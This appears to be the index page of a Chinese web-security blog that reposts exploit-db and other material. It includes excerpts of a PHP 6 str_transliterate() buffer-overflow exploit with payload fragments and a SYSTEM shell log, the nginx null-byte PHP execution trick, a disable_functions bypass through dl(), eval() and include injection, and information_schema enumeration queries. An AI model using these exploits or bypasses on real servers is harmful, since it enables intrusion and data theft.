2011年8月25日
admin 712 views
from:https://nealpoole.com/blog/2011/07/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/
After publishing my previous blog post on PHP, nginx configuration, and potential arbitrary code execution, I came across a separate null-byte injection vulnerability in older versions of nginx (0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37). By taking advantage of this vulnerability, an attacker can cause a server that uses PHP-FastCGI to execute any publicly accessible file on the server as PHP.
In vulnerable versions of nginx, null bytes are allowed in URIs by default (their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h). Individual modules have the ability to opt-out of handling URIs with null bytes. However, not all of them do; in particular, the FastCGI module does not.
The attack itself is simple: a malicious user who makes a request to http://example.com/file.ext%00.php causes file.ext to be parsed as PHP. If an attacker can control the contents of a file served up by nginx (ie: using an avatar upload form) the result is arbitrary code execution. This vulnerability can not be mitigated by nginx configuration settings like try_files or PHP configuration settings like cgi.fix_pathinfo: the only defense is to upgrade to a newer version of nginx or to explicitly block potentially malicious requests to directories containing user-controlled content. 阅读全文…
2010年5月4日
admin 1,368 views
http://www.exploit-db.com/papers/12490
##############################################################################
# [+]Title: [Eval() Vulnerability & Exploitation]
##############################################################################
# [+] About :
##############################################################################
# Written by : GlaDiaT0R
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team : Tunisian Power Team ( DarkGh0st.Net )
##############################################################################
# [+] Summary:
# [1]-Introduction
# [2]-Detection
# [3]-Vulnerable Source code
# [4]-Exploiting..
##############################################################################
[1]-Introduction
eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,
although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.
the problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such.
Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result.
We will even two different PHP source code using Eval (), the possibilities of PHP code injection and how how to use eval () can change the syntax of PHP code to execute.
阅读全文…
2010年4月25日
xion 1,538 views
本文章简单摘要:一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕include()&&require()语句:包括并运行指定文件。这两种结构除了在如何处理失败之外完全一样。include()产生一个警告而require()则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用require()。include()就不是这样。
一、涉及到的危险函数〔include(),require()和include_once(),require_once()〕
include() && require()语句:包括并运行指定文件。
这两种结构除了在如何处理失败之外完全一样。include() 产生一个警告而 require() 则导致一个致命错误。换句话说,如果你想在遇到丢失文件时停止处理页面就用 require()。include() 就不是这样,脚本会继续运行。
如果”allow_url_fopen”在 PHP 中被激活(默认配置),也可以用 URL(通过 HTTP 或者其它支持的封装协议)而不是本地文件来指定要被包括的文件。如果目标服务器将目标文件作为 PHP 代码解释,则可以用适用于 HTTP GET 的 URL 请求字符串来向被包括的文件传递变量。
详细参考:http://www.phpe.net/manual/function.include.php 阅读全文…
2010年4月15日
admin 2,042 views
apache+php Web安全配置全攻略
kindle整理
个人整理算不上原创,mysql的略过不说了
apache方面:
1.编译源代码,修改默认的banner
2.修改默认的http状态响应码404,503等默认页面
3.访问特殊目录需要密码.htaccess
4.关闭索引目录options -Indexes
5.关闭CGI执行程序options -ExecCGI
6.apache限制目录php_admin_value open_basedir /var/www
7.apache的php扩展名解析漏洞
apache配置文件,禁止.php.这样的文件执行,配置文件里面加入
<Files ~ “\.(php.|php3.)”>
Order Allow,Deny
Deny from all
</Files>
8.apache设置上传目录无执行权限
关闭路径/www/home/upload的php解析:
<Directory “/www/home/upload”>
<Files ~ “.php”>
Order allow,deny
Deny from all
</Files>
</Directory>
PHP方面:
阅读全文…
2010年4月14日
admin 1,864 views
来源:exploit-db.com
# Title: PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass
# EDB-ID: 12189
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Matteo Memelli
# Published: 2010-04-13
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
view source
print?
<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson
Matteo Memelli aka ryujin ( AT ) offsec.com
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)
Thx to muts and Elwood for helping ;)
Bruteforce script is attached in base64 format.
root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof || ryujin # offsec.com
(*) Bruteforcing WPM ret address…
(+) Trying base address 0×78000000
(+) Trying base address 0×77000000
(+) Trying base address 0×76000000
(+) Trying base address 0×75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\bin\apache\Apache2.2.11>whoami
whoami
nt authority\system
*/
阅读全文…
2010年4月13日
admin 1,797 views
利用dl函数突破disable_functions执行命令(剑心)
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
From:http://qiuren.blogbus.com
PHP是一款功能强大应用广泛的脚本语言,很大一部分网站都是使用PHP架构的。因为其提供了强大的文件操作功能和与系统交互的功能,所以大部分的服务器都对PHP做了严格的限制,包括使用open_basedir限制可以操作的目录以及使用disable_functions限制程序使用一些可以直接执行系统命令的函数如system,exec,passthru,shell_exec,proc_open等等。但是如果服务器没有对dl()函数做限制,一样可以利用dl()函数饶过这些限制。
dl()函数允许在php脚本里动态加载php模块,默认是加载extension_dir目录里的扩展,该选项是PHP_INI_SYSTEM范围可修改的,只能在php.ini或者apache主配置文件里修改。当然,你也可以通过enable_dl选项来关闭动态加载功能,而这个选项默认为On的,事实上也很少人注意到这个。dl()函数在设计时存在安全漏洞,可以用../这种目录遍历的方式指定加载任何一个目录里的so等扩展文件,extension_dir限制可以被随意饶过。所以我们可以上传自己的so文件,并且用dl函数加载这个so文件然后利用so文件里的函数执行其他操作,包括系统命令。
阅读全文…
2010年4月8日
admin 1,353 views
intval()使用不当导致安全漏洞的分析
author: xy7#80sec.com
from:http://www.80vul.com/pch/
一 描叙
intval函数有个特性:”直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时(\0)结束转换”,在某些应用程序里由于对intval函数这个特性认识不够,错误的使用导致绕过一些安全判断导致安全漏洞.
二 分析
PHP_FUNCTION(intval)
{
zval **num, **arg_base;
int base;
switch (ZEND_NUM_ARGS()) {
case 1:
if (zend_get_parameters_ex(1, &num) == FAILURE) {
WRONG_PARAM_COUNT;
}
base = 10;
break;
case 2:
if (zend_get_parameters_ex(2, &num, &arg_base) == FAILURE) {
WRONG_PARAM_COUNT;
}
convert_to_long_ex(arg_base);
base = Z_LVAL_PP(arg_base);
break;
default:
WRONG_PARAM_COUNT;
}
RETVAL_ZVAL(*num, 1, 0);
convert_to_long_base(return_value, base);
}
阅读全文…
2010年4月5日
admin 14,099 views
来源packetstorm.com
Web Application Auditing and Exploitation
By ReZEN
Index Title
Index
What is a Web Application
Intro To PHP
Function Exploitation Overview
Exploitable Functions
Examples
Application Assisted Auditing
Credits
Gr33tz / Fuckz
What is a “WebApp”?
In software engineering, a web application—sometimes
called a webapp and much less frequently a
weblication—is an application that’s accessed with a web
browser over a network such as the Internet or an
intranet. Web applications are popular due to the
ubiquity of the browser as a client, sometimes called a
thin client. The ability to update and maintain web
applications without distributing and installing software
on potentially thousands of client computers is a key
reason for their popularity. Web applications are used to
implement webmail, online retail sales, online auctions,
wikis, discussion boards, weblogs, MMORPGs, and many
other functions.
What is a “WebApp”? (cont.)
阅读全文…
2010年4月5日
admin 1,584 views
来源:http://www.exploit-db.com/exploits/12051
# Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# EDB-ID: 12051
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pr0T3cT10n
# Published: 2010-04-04
# Verified: no
# Download Exploit Code
# Download Vulnerable app
view source
print?
<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com<mailto:pr0t3ct10n@gmail.com>>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, ‘unicode.semantics’ has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool(‘unicode.semantics’)) {
$buff = str_repeat(“\u4141″, 256);
$eip = “\u1445\u10A9″; # 0x10A91445 JMP ESP @ php6ts.dll
$nops = str_repeat(“\u9090″, 20);
阅读全文…
2010年3月30日
xion 1,449 views
因为mysql5有information_schema数据库。就以前好像在哪看到过,今天自己找了下在information_schema.tables和information_schema.columns有个TABLE_SCHEMA变量可以限制数据库而非SCHEMA_NAME,记一下。
列数据库:
select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA;
列某数据库的表名:
select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=0x73716c696e;
列当前数据库的表名:
select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database();
列某数据库某表的字段名:
select group_concat(column_name) from information_schema.columns where table_name=0x61646d696e and TABLE_SCHEMA=0x73716c696e;